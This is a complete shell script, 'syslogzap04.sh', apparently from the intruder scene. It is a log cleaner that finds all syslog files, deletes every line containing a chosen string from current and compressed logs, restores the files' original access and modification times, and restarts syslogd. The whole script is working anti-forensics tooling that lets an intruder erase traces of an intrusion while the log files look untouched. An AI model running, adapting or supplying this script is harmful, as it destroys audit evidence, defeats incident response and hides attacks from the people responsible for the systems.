#!/bin/sh # # syslogzap04.sh # Log cleaner for syslog files # by xeon # # Using a simple grep cut off undesired string. # # Features: # - automatically find syslogd log files # - preserve log files uid/gid # - preserve rwx bitmask # - preserve access and mod time # - delete also zipped log # SYSLOG_CONF="/etc/syslog.conf" SYSLOG_PID=`cat /var/run/syslog*.pid` if [ $# == 0 ]; then echo "Give me a string to zap guy..." exit 0 fi if [ $SYSLOG_PID == "" ]; then echo "CANNOT FIND SYSLOGD PID!" exit 0 else echo "[+] Syslogd pid =" $SYSLOG_PID fi echo -n "[+] Parsing $SYSLOG_CONF..." if [ -r $SYSLOG_CONF ]; then SYSLOG_FILES=`cat $SYSLOG_CONF | tr -s " \t-" "\n" | sort | uniq | grep "/"` fi echo "done" echo "[+] Starting clean..." # cleaning current log for LOG in $SYSLOG_FILES; do echo -n " - Cleaning $LOG..." if [ -r $LOG ]; then echo -n "`wc -c $LOG | tr -s " " | cut -d" " -f2` -> " NEW_LOG="$LOG.gz.1" REF_LOG="$LOG.touch" touch -am -r $LOG $REF_LOG cp -f $LOG $NEW_LOG if [ -f $NEW_LOG ]; then grep -v $1 $NEW_LOG > $LOG rm -f $NEW_LOG echo "`wc -c $LOG | tr -s " " | cut -d" " -f2`" touch -am -r $REF_LOG $LOG rm -f $REF_LOG else echo " ERROR!!! Cannot create new log file" fi else echo " ERROR!!! Cannot open $LOG" fi # cleaning also its old files for ZIP_LOG in `ls $LOG*.gz* 2> /dev/null`; do echo -n " - Cleaning $ZIP_LOG..." echo -n "`wc -c $ZIP_LOG | tr -s " " | cut -d" " -f2` -> " NEW_LOG="$ZIP_LOG.gz.1" REF_LOG="$ZIP_LOG.touch" touch -am -r $ZIP_LOG $REF_LOG cp -f $ZIP_LOG $NEW_LOG if [ -f $NEW_LOG ]; then gzip -cd $NEW_LOG | grep -v $1 | gzip > $ZIP_LOG rm -f $NEW_LOG echo "`wc -c $ZIP_LOG | tr -s " " | cut -d" " -f2`" touch -am -r $REF_LOG $ZIP_LOG rm -f $REF_LOG else echo " ERROR!!! Cannot create new log file" fi done done echo -n "[+] Restarting syslogd..." kill -HUP $SYSLOG_PID echo "done"